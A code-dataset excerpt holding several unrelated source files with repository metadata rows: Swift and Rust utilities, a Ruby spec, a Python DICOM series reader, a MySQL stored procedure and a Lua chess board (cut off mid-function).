    /// Wraps the action in a DispatchWorkItem, schedules it on
    /// `executeQueue` (via `defer`, after the item is created) and returns
    /// the item so callers can observe or cancel it.
    open override func executeImpl(parameter: Any?) -> DispatchWorkItem {
        let workItem = DispatchWorkItem {
            self.execute(parameter)
        }
        defer {
            executeQueue.async(execute: workItem)
        }
        return workItem
    }
    /// Allows execution when no predicate is set or the predicate passes.
    open override func canExecuteImpl(parameter: Any?) -> Bool {
        return self.canExecute?(parameter) != false
    }
}
public extension ActionCommand {
convenience init<Source: AnyObject>(
_ source: Source,
execute: @escaping (Source) -> Void,
canExecute: @escaping (Source) -> Bool)
{
self.init(
execute: { [weak source] in
if let src = source {
execute(src)
}
},
canExecute: { [weak source] in
if let src = source {
return canExecute(src)
} else {
return false
}
}
)
}
convenience init<Source: AnyObject, TParam>(
_ source: Source,
executeGeneric: @escaping (Source, TParam) -> Void,
canExecute: @escaping (Source, TParam) -> Bool)
{
self.init(
execute: { [weak source] (param: TParam) in
if let src = source {
executeGeneric(src, param)
}
},
canExecute: { [weak source] (param: TParam) in
if let src = source {
return canExecute(src, param)
} else {
return false
}
}
)
}
convenience init<Source: AnyObject>(_ source: Source, execute: @escaping (Source) -> Void) {
self.init(source, execute: { execute($0) }, canExecute: { _ in return true } )
}
convenience init<Source: AnyObject, Param>(_ source: Source, execute: @escaping (Source, Param) -> Void) {
self.init(source, executeGeneric: { execute($0, $1) }, canExecute: { (_, _) in return true } )
}
}
| 28.513761 | 110 | 0.52027 | 3 |
21b0efa986efb538633538be931b8baed7abf5e5 | 1,006 | rs | Rust | bin/xcm-tools/src/cli.rs | stakedtechnologies/Neon | d7719ff137227caa590d5e4096abc5ed850e0b60 | [
"Apache-2.0"
] | 1 | 2019-03-25T06:43:56.000Z | 2019-03-25T06:43:56.000Z | bin/xcm-tools/src/cli.rs | stakedtechnologies/Neon | d7719ff137227caa590d5e4096abc5ed850e0b60 | [
"Apache-2.0"
] | null | null | null | bin/xcm-tools/src/cli.rs | stakedtechnologies/Neon | d7719ff137227caa590d5e4096abc5ed850e0b60 | [
"Apache-2.0"
] | null | null | null | /// Astar XCM tools.
#[derive(Debug, clap::Parser)]
#[clap(subcommand_required = true)]
pub struct Cli {
/// Possible subcommand with parameters.
#[clap(subcommand)]
pub subcommand: Option<Subcommand>,
}
/// Possible subcommands of the main binary.
#[derive(Debug, clap::Subcommand)]
pub enum Subcommand {
/// Prints parachain AccountId.
ParachainAccount(ParachainAccountCmd),
/// Prints AssetId for desired parachain asset.
AssetId(AssetIdCmd),
}
/// Helper that prints AccountId of parachain.
#[derive(Debug, clap::Parser)]
pub struct ParachainAccountCmd {
/// Print address for sibling parachain [child by default].
#[clap(short)]
pub sibling: bool,
/// Target ParaId.
pub parachain_id: u32,
}
/// Helper that prints AssetId for sibling parachain asset.
#[derive(Debug, clap::Parser)]
pub struct AssetIdCmd {
/// External AssetId [relay by default].
#[clap(default_value = "340282366920938463463374607431768211455")]
pub asset_id: u128,
}
| 27.189189 | 70 | 0.702783 | 3 |
1821f3b96a5935c203b3edf6a44aabdd1c70fb05 | 1,070 | rb | Ruby | gem/spec/lib/core/threading_spec.rb | floere/gosu_extensions | f2432fdaae277294b4b3b751f326fad1843ef335 | [
"MIT"
] | 1 | 2015-08-16T19:06:27.000Z | 2015-08-16T19:06:27.000Z | gem/spec/lib/core/threading_spec.rb | floere/gosu_extensions | f2432fdaae277294b4b3b751f326fad1843ef335 | [
"MIT"
] | null | null | null | gem/spec/lib/core/threading_spec.rb | floere/gosu_extensions | f2432fdaae277294b4b3b751f326fad1843ef335 | [
"MIT"
] | null | null | null | require File.join(File.dirname(__FILE__), '/../../spec_helper')
describe Threading do
before(:each) do
@window = stub :window, :things => []
@threaded = test_class_with(Threading).new @window
end
describe "sometimes" do
it "should only call the block's content every x times" do
@threaded.stub! :threaded => nil
@threaded.sometimes(:some_id, :some_time) { :some_result }.should == :some_result
@threaded.sometimes(:some_id, :some_time) { :some_result }.should == nil
@threaded.instance_variable_set(:'@__sometimes_some_id', false)
@threaded.sometimes(:some_id, :some_time) { :some_result }.should == :some_result
end
end
describe "threaded" do
before(:each) do
@scheduling = stub :scheduling
@window.stub! :scheduling => @scheduling
end
it "should delegate to the window's scheduling" do
some_block = lambda {}
@scheduling.should_receive(:add).once.with :some_time, &some_block
@threaded.threaded :some_time, &some_block
end
end
end | 30.571429 | 87 | 0.657944 | 3.015625 |
330f0c3baa6b73293fcd4fabbaa5457656f166bd | 22,550 | py | Python | pydicom_ext/pydicom_series.py | shinaji/pydicom_ext | bc3d716eb488589ba5906a0722474682987dafb8 | [
"MIT"
] | null | null | null | pydicom_ext/pydicom_series.py | shinaji/pydicom_ext | bc3d716eb488589ba5906a0722474682987dafb8 | [
"MIT"
] | null | null | null | pydicom_ext/pydicom_series.py | shinaji/pydicom_ext | bc3d716eb488589ba5906a0722474682987dafb8 | [
"MIT"
] | null | null | null | # dicom_series.py
"""
By calling the function read_files with a directory name or list
of files as an argument, a list of DicomSeries instances can be
obtained. A DicomSeries object has some attributes that give
information about the serie (such as shape, sampling, suid) and
has an info attribute, which is a pydicom.DataSet instance containing
information about the first dicom file in the serie. The data can
be obtained using the get_pixel_array() method, which produces a
3D numpy array if there a multiple files in the serie.
This module can deal with gated data, in which case a DicomSeries
instance is created for each 3D volume.
"""
from __future__ import print_function
#
# Copyright (c) 2010 Almar Klein
# This file is released under the pydicom license.
# See the file LICENSE included with the pydicom distribution, also
# available at https://github.com/pydicom/pydicom
#
# I (Almar) performed some test to loading a series of data
# in two different ways: loading all data, and deferring loading
# the data. Both ways seem equally fast on my system. I have to
# note that results can differ quite a lot depending on the system,
# but still I think this suggests that deferred reading is in
# general not slower. I think deferred loading of the pixel data
# can be advantageous because maybe not all data of all series
# is needed. Also it simply saves memory, because the data is
# removed from the Dataset instances.
# In the few result below, cold means reading for the first time,
# warm means reading 2nd/3d/etc time.
# - Full loading of data, cold: 9 sec
# - Full loading of data, warm: 3 sec
# - Deferred loading of data, cold: 9 sec
# - Deferred loading of data, warm: 3 sec
import os
import time
import gc
import pydicom
from pydicom.sequence import Sequence
from pydicom import compat
# Try importing numpy
try:
import numpy as np
have_numpy = True
except ImportError:
np = None # NOQA
have_numpy = False
# Helper functions and classes
class ProgressBar(object):
""" To print progress to the screen.
"""
def __init__(self, char='-', length=20):
self.char = char
self.length = length
self.progress = 0.0
self.nbits = 0
self.what = ''
def Start(self, what=''):
""" Start(what='')
Start the progress bar, displaying the given text first.
Make sure not to print anything untill after calling
Finish(). Messages can be printed while displaying
progess by using printMessage().
"""
self.what = what
self.progress = 0.0
self.nbits = 0
sys.stdout.write(what + " [")
def Stop(self, message=""):
""" Stop the progress bar where it is now.
Optionally print a message behind it."""
delta = int(self.length - self.nbits)
sys.stdout.write(" " * delta + "] " + message + "\n")
def Finish(self, message=""):
""" Finish the progress bar, setting it to 100% if it
was not already. Optionally print a message behind the bar.
"""
delta = int(self.length - self.nbits)
sys.stdout.write(self.char * delta + "] " + message + "\n")
def Update(self, newProgress):
""" Update progress. Progress is given as a number
between 0 and 1.
"""
self.progress = newProgress
required = self.length * (newProgress)
delta = int(required - self.nbits)
if delta > 0:
sys.stdout.write(self.char * delta)
self.nbits += delta
def PrintMessage(self, message):
""" Print a message (for example a warning).
The message is printed behind the progress bar,
and a new bar is started.
"""
self.Stop(message)
self.Start(self.what)
def _dummyProgressCallback(progress):
""" A callback to indicate progress that does nothing. """
pass
_progressBar = ProgressBar()
def _progressCallback(progress):
""" The default callback for displaying progress. """
if isinstance(progress, compat.string_types):
_progressBar.Start(progress)
_progressBar._t0 = time.time()
elif progress is None:
dt = time.time() - _progressBar._t0
_progressBar.Finish('%2.2f seconds' % dt)
else:
_progressBar.Update(progress)
def _listFiles(files, path):
"""List all files in the directory, recursively. """
for item in os.listdir(path):
item = os.path.join(path, item)
if os.path.isdir(item):
_listFiles(files, item)
else:
files.append(item)
def _splitSerieIfRequired(serie, series):
""" _splitSerieIfRequired(serie, series)
Split the serie in multiple series if this is required.
The choice is based on examing the image position relative to
the previous image. If it differs too much, it is assumed
that there is a new dataset. This can happen for example in
unspitted gated CT data.
"""
# Sort the original list and get local name
serie._sort()
L = serie._datasets
# Init previous slice
ds1 = L[0]
# Check whether we can do this
if "ImagePositionPatient" not in ds1:
return
# Initialize a list of new lists
L2 = [[ds1]]
# Init slice distance estimate
distance = 0
for index in range(1, len(L)):
# Get current slice
ds2 = L[index]
# Get positions
pos1 = float(ds1.ImagePositionPatient[2])
pos2 = float(ds2.ImagePositionPatient[2])
# Get distances
newDist = abs(pos1 - pos2)
# deltaDist = abs(firstPos-pos2)
# If the distance deviates more than 2x from what we've seen,
# we can agree it's a new dataset.
if distance and newDist > 2.1 * distance:
L2.append([])
distance = 0
else:
# Test missing file
if distance and newDist > 1.5 * distance:
print('Warning: missing file after "%s"' % ds1.filename)
distance = newDist
# Add to last list
L2[-1].append(ds2)
# Store previous
ds1 = ds2
# Split if we should
if len(L2) > 1:
# At what position are we now?
i = series.index(serie)
# Create new series
series2insert = []
for L in L2:
newSerie = DicomSeries(serie.suid, serie._showProgress)
newSerie._datasets = Sequence(L)
series2insert.append(newSerie)
# Insert series and remove self
for newSerie in reversed(series2insert):
series.insert(i, newSerie)
series.remove(serie)
pixelDataTag = pydicom.tag.Tag(0x7fe0, 0x0010)
def _getPixelDataFromDataset(ds):
""" Get the pixel data from the given dataset. If the data
was deferred, make it deferred again, so that memory is
preserved. Also applies RescaleSlope and RescaleIntercept
if available. """
# Get original element
el = dict.__getitem__(ds, pixelDataTag)
# Get data
data = np.array(ds.pixel_array)
# Remove data (mark as deferred)
dict.__setitem__(ds, pixelDataTag, el)
del ds._pixel_array
# Obtain slope and offset
slope = 1
offset = 0
needFloats = False
needApplySlopeOffset = False
if 'RescaleSlope' in ds:
needApplySlopeOffset = True
slope = ds.RescaleSlope
if 'RescaleIntercept' in ds:
needApplySlopeOffset = True
offset = ds.RescaleIntercept
if int(slope) != slope or int(offset) != offset:
needFloats = True
if not needFloats:
slope, offset = int(slope), int(offset)
# Apply slope and offset
if needApplySlopeOffset:
# Maybe we need to change the datatype?
if data.dtype in [np.float32, np.float64]:
pass
elif needFloats:
data = data.astype(np.float32)
else:
# Determine required range
minReq, maxReq = data.min(), data.max()
minReq = min(
[minReq, minReq * slope + offset, maxReq * slope + offset])
maxReq = max(
[maxReq, minReq * slope + offset, maxReq * slope + offset])
# Determine required datatype from that
dtype = None
if minReq < 0:
# Signed integer type
maxReq = max([-minReq, maxReq])
if maxReq < 2**7:
dtype = np.int8
elif maxReq < 2**15:
dtype = np.int16
elif maxReq < 2**31:
dtype = np.int32
else:
dtype = np.float32
else:
# Unsigned integer type
if maxReq < 2**8:
dtype = np.uint8
elif maxReq < 2**16:
dtype = np.uint16
elif maxReq < 2**32:
dtype = np.uint32
else:
dtype = np.float32
# Change datatype
if dtype != data.dtype:
data = data.astype(dtype)
# Apply slope and offset
data *= slope
data += offset
# Done
return data
# The public functions and classes
def read_files(path, showProgress=False, readPixelData=False, force=False):
""" read_files(path, showProgress=False, readPixelData=False)
Reads dicom files and returns a list of DicomSeries objects, which
contain information about the data, and can be used to load the
image or volume data.
The parameter "path" can also be a list of files or directories.
If the callable "showProgress" is given, it is called with a single
argument to indicate the progress. The argument is a string when a
progress is started (indicating what is processed). A float indicates
progress updates. The paremeter is None when the progress is finished.
When "showProgress" is True, a default callback is used that writes
to stdout. By default, no progress is shown.
if readPixelData is True, the pixel data of all series is read. By
default the loading of pixeldata is deferred until it is requested
using the DicomSeries.get_pixel_array() method. In general, both
methods should be equally fast.
"""
# Init list of files
files = []
# Obtain data from the given path
if isinstance(path, compat.string_types):
# Make dir nice
basedir = os.path.abspath(path)
# Check whether it exists
if not os.path.isdir(basedir):
raise ValueError('The given path is not a valid directory.')
# Find files recursively
_listFiles(files, basedir)
elif isinstance(path, (tuple, list)):
# Iterate over all elements, which can be files or directories
for p in path:
if os.path.isdir(p):
_listFiles(files, os.path.abspath(p))
elif os.path.isfile(p):
files.append(p)
else:
print("Warning, the path '%s' is not valid." % p)
else:
raise ValueError('The path argument must be a string or list.')
# Set default progress callback?
if showProgress is True:
showProgress = _progressCallback
if not hasattr(showProgress, '__call__'):
showProgress = _dummyProgressCallback
# Set defer size
deferSize = 16383 # 128**2-1
if readPixelData:
deferSize = None
# Gather file data and put in DicomSeries
series = {}
count = 0
showProgress('Loading series information:')
for filename in files:
# Skip DICOMDIR files
if filename.count("DICOMDIR"):
continue
# Try loading dicom ...
try:
dcm = pydicom.read_file(filename, deferSize, force=force)
except pydicom.filereader.InvalidDicomError:
continue # skip non-dicom file
except Exception as why:
if showProgress is _progressCallback:
_progressBar.PrintMessage(str(why))
else:
print('Warning:', why)
continue
# Get SUID and register the file with an existing or new series object
try:
suid = dcm.SeriesInstanceUID
except AttributeError:
continue # some other kind of dicom file
if suid not in series:
series[suid] = DicomSeries(suid, showProgress)
series[suid]._append(dcm)
# Show progress (note that we always start with a 0.0)
showProgress(float(count) / len(files))
count += 1
# Finish progress
showProgress(None)
# Make a list and sort, so that the order is deterministic
series = list(series.values())
series.sort(key=lambda x: x.suid)
# Split series if necessary
for serie in reversed([serie for serie in series]):
_splitSerieIfRequired(serie, series)
# Finish all series
showProgress('Analysing series')
series_ = []
for i in range(len(series)):
try:
series[i]._finish()
series_.append(series[i])
except Exception:
pass # Skip serie (probably report-like file without pixels)
showProgress(float(i + 1) / len(series))
showProgress(None)
return series_
class DicomSeries(object):
""" DicomSeries
This class represents a serie of dicom files that belong together.
If these are multiple files, they represent the slices of a volume
(like for CT or MRI). The actual volume can be obtained using loadData().
Information about the data can be obtained using the info attribute.
"""
# To create a DicomSeries object, start by making an instance and
# append files using the "_append" method. When all files are
# added, call "_sort" to sort the files, and then "_finish" to evaluate
# the data, perform some checks, and set the shape and sampling
# attributes of the instance.
def __init__(self, suid, showProgress):
# Init dataset list and the callback
self._datasets = Sequence()
self._showProgress = showProgress
# Init props
self._suid = suid
self._info = None
self._shape = None
self._sampling = None
@property
def suid(self):
""" The Series Instance UID. """
return self._suid
@property
def shape(self):
""" The shape of the data (nz, ny, nx).
If None, the serie contains a single dicom file. """
return self._shape
@property
def sampling(self):
""" The sampling (voxel distances) of the data (dz, dy, dx).
If None, the serie contains a single dicom file. """
return self._sampling
@property
def info(self):
""" A DataSet instance containing the information as present in the
first dicomfile of this serie. """
return self._info
@property
def description(self):
""" A description of the dicom series. Used fields are
PatientName, shape of the data, SeriesDescription,
and ImageComments.
"""
info = self.info
# If no info available, return simple description
if info is None:
return "DicomSeries containing %i images" % len(self._datasets)
fields = []
# Give patient name
if 'PatientName' in info:
fields.append("" + info.PatientName)
# Also add dimensions
if self.shape:
tmp = [str(d) for d in self.shape]
fields.append('x'.join(tmp))
# Try adding more fields
if 'SeriesDescription' in info:
fields.append("'" + info.SeriesDescription + "'")
if 'ImageComments' in info:
fields.append("'" + info.ImageComments + "'")
# Combine
return ' '.join(fields)
def __repr__(self):
adr = hex(id(self)).upper()
data_len = len(self._datasets)
return "<DicomSeries with %i images at %s>" % (data_len, adr)
def get_pixel_array(self):
""" get_pixel_array()
Get (load) the data that this DicomSeries represents, and return
it as a numpy array. If this serie contains multiple images, the
resulting array is 3D, otherwise it's 2D.
If RescaleSlope and RescaleIntercept are present in the dicom info,
the data is rescaled using these parameters. The data type is chosen
depending on the range of the (rescaled) data.
"""
# Can we do this?
if not have_numpy:
msg = "The Numpy package is required to use get_pixel_array.\n"
raise ImportError(msg)
# It's easy if no file or if just a single file
if len(self._datasets) == 0:
raise ValueError('Serie does not contain any files.')
elif len(self._datasets) == 1:
ds = self._datasets[0]
slice = _getPixelDataFromDataset(ds)
return slice
# Check info
if self.info is None:
raise RuntimeError("Cannot return volume if series not finished.")
# Set callback to update progress
showProgress = self._showProgress
# Init data (using what the dicom packaged produces as a reference)
ds = self._datasets[0]
slice = _getPixelDataFromDataset(ds)
# vol = Aarray(self.shape, self.sampling, fill=0, dtype=slice.dtype)
vol = np.zeros(self.shape, dtype=slice.dtype)
vol[0] = slice
# Fill volume
showProgress('Loading data:')
ll = self.shape[0]
for z in range(1, ll):
ds = self._datasets[z]
vol[z] = _getPixelDataFromDataset(ds)
showProgress(float(z) / ll)
# Finish
showProgress(None)
# Done
gc.collect()
return vol
def _append(self, dcm):
""" _append(dcm)
Append a dicomfile (as a pydicom.dataset.FileDataset) to the series.
"""
self._datasets.append(dcm)
def _sort(self):
""" sort()
Sort the datasets by instance number.
"""
self._datasets._list.sort(key=lambda k: k.InstanceNumber)
def _finish(self):
""" _finish()
Evaluate the series of dicom files. Together they should make up
a volumetric dataset. This means the files should meet certain
conditions. Also some additional information has to be calculated,
such as the distance between the slices. This method sets the
attributes for "shape", "sampling" and "info".
This method checks:
* that there are no missing files
* that the dimensions of all images match
* that the pixel spacing of all images match
"""
# The datasets list should be sorted by instance number
L = self._datasets
if len(L) == 0:
return
elif len(L) < 2:
# Set attributes
ds = self._datasets[0]
self._info = self._datasets[0]
self._shape = [ds.Rows, ds.Columns]
self._sampling = [
float(ds.PixelSpacing[0]), float(ds.PixelSpacing[1])
]
return
# Get previous
ds1 = L[0]
# Init measures to calculate average of
distance_sum = 0.0
# Init measures to check (these are in 2D)
dimensions = ds1.Rows, ds1.Columns
# row, column
sampling = float(ds1.PixelSpacing[0]), float(ds1.PixelSpacing[1])
for index in range(len(L)):
# The first round ds1 and ds2 will be the same, for the
# distance calculation this does not matter
# Get current
ds2 = L[index]
# Get positions
pos1 = float(ds1.ImagePositionPatient[2])
pos2 = float(ds2.ImagePositionPatient[2])
# Update distance_sum to calculate distance later
distance_sum += abs(pos1 - pos2)
# Test measures
dimensions2 = ds2.Rows, ds2.Columns
sampling2 = float(ds2.PixelSpacing[0]), float(ds2.PixelSpacing[1])
if dimensions != dimensions2:
# We cannot produce a volume if the dimensions match
raise ValueError('Dimensions of slices does not match.')
if sampling != sampling2:
# We can still produce a volume, but we should notify the user
msg = 'Warning: sampling does not match.'
if self._showProgress is _progressCallback:
_progressBar.PrintMessage(msg)
else:
print(msg)
# Store previous
ds1 = ds2
# Create new dataset by making a deep copy of the first
info = pydicom.dataset.Dataset()
firstDs = self._datasets[0]
for key in firstDs.keys():
if key != (0x7fe0, 0x0010):
el = firstDs[key]
info.add_new(el.tag, el.VR, el.value)
# Finish calculating average distance
# (Note that there are len(L)-1 distances)
distance_mean = distance_sum / (len(L) - 1)
# Store information that is specific for the serie
self._shape = [len(L), ds2.Rows, ds2.Columns]
self._sampling = [distance_mean, float(ds2.PixelSpacing[0]),
float(ds2.PixelSpacing[1])]
# Store
self._info = info
if __name__ == '__main__':
import sys
if len(sys.argv) != 2:
print("Expected a single argument: a directory with dicom files in it")
else:
adir = sys.argv[1]
t0 = time.time()
all_series = read_files(adir, None, False)
print("Summary of each series:")
for series in all_series:
print(series.description)
| 32.823872 | 80 | 0.587095 | 3.125 |
a70f4bfdf6e56a2d004b9b30fc713c8e183a22d4 | 1,770 | swift | Swift | Carthage/Checkouts/ReactiveCocoa/Carthage/Checkouts/ReactiveSwift/Sources/Observers/Throttle.swift | arcangelw/ReactiveAutomaton | e2876b876ac3ba79f0ca797d04567e8469b3c2bb | [
"MIT"
] | 3,078 | 2016-09-11T01:54:26.000Z | 2022-03-25T09:38:59.000Z | Carthage/Checkouts/ReactiveCocoa/Carthage/Checkouts/ReactiveSwift/Sources/Observers/Throttle.swift | arcangelw/ReactiveAutomaton | e2876b876ac3ba79f0ca797d04567e8469b3c2bb | [
"MIT"
] | 602 | 2016-09-11T12:12:29.000Z | 2022-03-30T14:45:06.000Z | Sources/Observers/Throttle.swift | isabella232/ReactiveSwift | efb2f0a6f6c8739cce8fb14148a5bd3c83f2f91d | [
"MIT"
] | 565 | 2016-09-11T07:04:27.000Z | 2022-03-16T19:57:51.000Z | import Foundation
extension Operators {
internal final class Throttle<Value, Error: Swift.Error>: UnaryAsyncOperator<Value, Value, Error> {
let interval: TimeInterval
let targetWithClock: DateScheduler
private let state: Atomic<ThrottleState<Value>> = Atomic(ThrottleState())
private let schedulerDisposable = SerialDisposable()
init(
downstream: Observer<Value, Error>,
downstreamLifetime: Lifetime,
target: DateScheduler,
interval: TimeInterval
) {
precondition(interval >= 0)
self.interval = interval
self.targetWithClock = target
super.init(downstream: downstream, downstreamLifetime: downstreamLifetime, target: target)
downstreamLifetime += schedulerDisposable
}
override func receive(_ value: Value) {
let scheduleDate: Date = state.modify { state in
state.pendingValue = value
let proposedScheduleDate: Date
if let previousDate = state.previousDate, previousDate <= targetWithClock.currentDate {
proposedScheduleDate = previousDate.addingTimeInterval(interval)
} else {
proposedScheduleDate = targetWithClock.currentDate
}
return proposedScheduleDate < targetWithClock.currentDate ? targetWithClock.currentDate : proposedScheduleDate
}
schedulerDisposable.inner = targetWithClock.schedule(after: scheduleDate) {
guard self.isActive else { return }
if let pendingValue = self.state.modify({ $0.retrieveValue(date: scheduleDate) }) {
self.unscheduledSend(pendingValue)
}
}
}
}
}
private struct ThrottleState<Value> {
var previousDate: Date?
var pendingValue: Value?
mutating func retrieveValue(date: Date) -> Value? {
defer {
if pendingValue != nil {
pendingValue = nil
previousDate = date
}
}
return pendingValue
}
}
| 27.230769 | 114 | 0.736723 | 3.078125 |
71e243140310dbc868442ebb0c4493d5cf29492e | 2,707 | sql | SQL | procedures/saveServantInfo.sql | sir-nutty/myChaldea-DB | 796d9f76d7dd64eff2923c92f0031589573d9c60 | [
"MIT"
] | null | null | null | procedures/saveServantInfo.sql | sir-nutty/myChaldea-DB | 796d9f76d7dd64eff2923c92f0031589573d9c60 | [
"MIT"
] | null | null | null | procedures/saveServantInfo.sql | sir-nutty/myChaldea-DB | 796d9f76d7dd64eff2923c92f0031589573d9c60 | [
"MIT"
] | null | null | null | CREATE DEFINER=`admin`@`10.150.0.2` PROCEDURE `saveServantInfo`(IN
user_uid VARCHAR(100),
servantName VARCHAR(100),
servantID SMALLINT,
servantType VARCHAR(30),
servantLevel TINYINT,
servantWiki VARCHAR(100),
servantFandom VARCHAR(100))
BEGIN
/*Changelog:
- 02/02/2021: Added isAdmin check.*/
DECLARE isAdmin, isServantExist, isError BOOLEAN;
DECLARE class_ID, curr_class_ID, servant_level, curr_servant_level, rarity_ID TINYINT;
DECLARE servant_name VARCHAR(100);
SET isAdmin = (SELECT getIsUserAdmin(user_uid));
IF (isAdmin) THEN -- Only proceed if user is an admin
SET class_ID = (SELECT `id` FROM `mychaldea`.`class` WHERE `name` = servantType); -- Get class ID
CASE -- Get rarity ID
WHEN servantLevel < 3 THEN SET rarity_ID = 1; -- Bronze servant
WHEN servantLevel = 3 THEN SET rarity_ID = 2; -- Silver servant
WHEN servantLevel > 3 THEN SET rarity_ID = 3; -- Gold servant
END CASE;
SET isServantExist = (SELECT IF((SELECT COUNT(*) FROM servant WHERE id = servantID OR name = servantName) > 0, TRUE, FALSE)); -- Check if servant exists
SET isError = (SELECT IF((SELECT COUNT(*) FROM servant WHERE id = servantID AND name = servantName) > 0, FALSE, TRUE)); -- Check if servant is in error
-- Save Servant
IF (!isServantExist) THEN -- Servant doesn't exist, insert it
INSERT INTO `mychaldea`.`servant` (`id`, `classID`, `name`, `star_Level`, `rarityID`) VALUES (servantID, class_ID, servantName, servantLevel, rarity_ID); -- Add to Servant
CALL saveServantLink(servantID, 1, servantWiki); -- Add Wiki Link
CALL saveServantLink(servantID, 2, servantFandom); -- Add Fandom Link
ELSE -- Servant doesn't exist. Proceed to update.
IF (!isError) THEN -- Servant to update isn't in error. Proceed.
SET curr_class_ID = (SELECT `classID` FROM `mychaldea`.`servant` WHERE `id` = servantID);
IF (curr_class_ID != class_ID || curr_class_ID IS NULL) THEN -- Servant class is different. Update class.
UPDATE `mychaldea`.`servant` SET `classID` = class_ID WHERE (`id` = servantID);
END IF;
SET curr_servant_level = (SELECT `star_Level` FROM `mychaldea`.`servant` WHERE `id` = servantID);
IF (curr_servant_level != servantLevel || curr_servant_level IS NULL) THEN -- Servant level is different. Update level & rarity.
UPDATE `mychaldea`.`servant` SET `star_Level` = servantLevel WHERE (`id` = servantID);
UPDATE `mychaldea`.`servant` SET `rarityID` = rarity_ID WHERE (`id` = servantID);
END IF;
CALL saveServantLink(servantID, 1, servantWiki); -- Add Wiki Link
CALL saveServantLink(servantID, 2, servantFandom); -- Add Fandom Link
END IF;
END IF;
END IF;
END | 52.057692 | 174 | 0.700406 | 3.140625 |
e72d543325127793a428caa4bb50e28f374dcb4c | 11,270 | lua | Lua | Board.lua | AhmedDawoud3/Chess-Love2D | c2555dd61d13d4e1fd2e8b218f874fab012b8c86 | [
"MIT"
] | null | null | null | Board.lua | AhmedDawoud3/Chess-Love2D | c2555dd61d13d4e1fd2e8b218f874fab012b8c86 | [
"MIT"
] | null | null | null | Board.lua | AhmedDawoud3/Chess-Love2D | c2555dd61d13d4e1fd2e8b218f874fab012b8c86 | [
"MIT"
] | null | null | null | lightCol = {241 / 255, 217 / 255, 192 / 255, 1}
darkCol = {169 / 255, 122 / 255, 101 / 255, 1}
WIDTH = 960
HEIGHT = 960
squareTileWidth = WIDTH / 8
squareTileHeight = HEIGHT / 8
local queenShadow = 0
local rookShadow = 0
local knightShadow = 0
local bishopShadow = 0
--- Draws the 8x8 checkerboard background.
-- Squares alternate between lightCol and darkCol; file/rank run 0..7 from
-- the top-left corner. Fix: the loop temporaries were previously implicit
-- globals — they are now declared local so they no longer leak module state.
-- The extra setColor(1, 1, 1, 1) per square was removed because DrawSquare
-- already restores opaque white before returning.
function CreateGraphicalBoard()
    for file = 0, 7 do
        for rank = 0, 7 do
            local isLightSquare = (file + rank) % 2 ~= 0
            -- NOTE(review): a "light" square intentionally gets darkCol here;
            -- this matches the original rendering and is kept as-is.
            local squareColour = (isLightSquare and darkCol) or lightCol
            local position = {file, rank}
            DrawSquare(squareColour, position)
        end
    end
end
--- Fills one board square with a colour.
-- @param col {r, g, b, a} colour components in 0..1
-- @param pos {file, rank} board coordinates, each 0..7
-- Leaves the active draw colour reset to opaque white.
function DrawSquare(col, pos)
    local r, g, b, a = col[1], col[2], col[3], col[4]
    local x = pos[1] * squareTileWidth
    local y = pos[2] * squareTileHeight
    love.graphics.setColor(r, g, b, a)
    love.graphics.rectangle("fill", x, y, squareTileWidth, squareTileHeight)
    love.graphics.setColor(1, 1, 1, 1)
end
Board = Class {}

--- Initialises an empty board.
-- Square[1..64] holds {pieceCode, flagA, flagB}; pieceCode 0 means empty.
-- flagA gates drawing in DisplayPieces; flagB's role is not visible in this
-- file — TODO confirm against the rest of the codebase.
function Board:init()
    self.Square = {}
    self.LightPieces = {}
    self.DarkPieces = {}
    self.kingSquare = {}
    local index = 1
    while index <= 64 do
        self.Square[index] = {0, false, true}
        index = index + 1
    end
end
--- Draws every visible piece on the board, plus the piece being dragged.
-- A square entry is {pieceCode, visible, ...}; pieces with code 0, a nil
-- texture quad, or visible == false are skipped. The floating (dragged)
-- piece, if any, is drawn centred on the stored mouse position.
function Board:DisplayPieces()
    for squareIndex, squareData in ipairs(self.Square) do
        local pieceCode = squareData[1]
        if pieceCode ~= 0 then
            local quad = Loader:GetPiece(pieceCode)
            if quad ~= nil and squareData[2] then
                local drawX, drawY = SquareToCordinate(squareIndex)
                love.graphics.draw(Loader.piecesTexture, quad, drawX, drawY)
            end
        end
    end
    if floatingPiece then
        local code = floatingPiece[1]
        local mousePos = floatingPiece[2]
        -- Offset by 60px so the sprite is centred under the cursor.
        love.graphics.draw(Loader.piecesTexture, Loader:GetPiece(code), mousePos[1] - 60, mousePos[2] - 60)
    end
end
--- Highlights the start and target squares of the most recent move.
-- Fix: previously indexed oldMoves[#oldMoves] unconditionally, which raised
-- an error when no move had been played yet; now it returns early instead.
-- The last move is also hoisted into a local rather than re-indexed four times.
function Board:DisplayLastMoves()
    local lastMove = oldMoves[#oldMoves]
    if not lastMove then
        return
    end
    DrawSquare({0.78, 0.78, 0.24, 0.5}, {FileIndex(lastMove.StartSquare), RankIndex(lastMove.StartSquare)})
    DrawSquare({0.78, 0.78, 0.24, 0.7}, {FileIndex(lastMove.TargetSquare), RankIndex(lastMove.TargetSquare)})
end
--- Highlights every legal target square for the selected piece,
-- and the selected piece's own square when it has at least one move.
-- Reads the module-level `moves` list and `selectedPieceSquare`.
function Board:DisplayLegalMoves()
    local targetTint = {0.8, 0.1, 0.2, 0.7}
    for _, move in ipairs(moves) do
        if move then
            local square = move.TargetSquare
            DrawSquare(targetTint, {FileIndex(square), RankIndex(square)})
        end
    end
    local hasMoves = #moves > 0
    if selectedPieceSquare and hasMoves then
        DrawSquare({1, 0.65, 0.2, 0.8}, {FileIndex(selectedPieceSquare), RankIndex(selectedPieceSquare)})
    end
end
--- Highlights the square of any king currently in check.
-- IsCheck(colour) is expected to return a falsy value when that colour is
-- not in check, otherwise a table whose second entry is the checked king's
-- square — presumed from its use here; confirm against IsCheck's definition.
-- Fix: each IsCheck result is now computed once per colour instead of three
-- times (condition + two uses), and the duplicated branch is folded into a loop.
function Board:DisplayChecks()
    local highlight = {0.4, 0.8, 0.2, 0.7}
    for _, colour in ipairs({Piece().Black, Piece().White}) do
        local check = IsCheck(colour)
        if check then
            DrawSquare(highlight, {FileIndex(check[2]), RankIndex(check[2])})
        end
    end
end
-- Draw the pawn-promotion chooser (queen/rook/bishop/knight) and apply
-- the clicked choice via Piece().Promote.  Runs only while
-- Game.promotionAvalible is set.  The per-piece *Shadow globals animate
-- a small hover offset (0..10) and are updated every frame.
function Board:GetPiecePromotion()
    if Game.promotionAvalible ~= true then
        return
    end
    -- The promoted piece takes the colour opposite to promotionColor.
    local col = Game.promotionColor == Piece().White and Piece().Black or Piece().White
    local mouseX = love.mouse.getX()
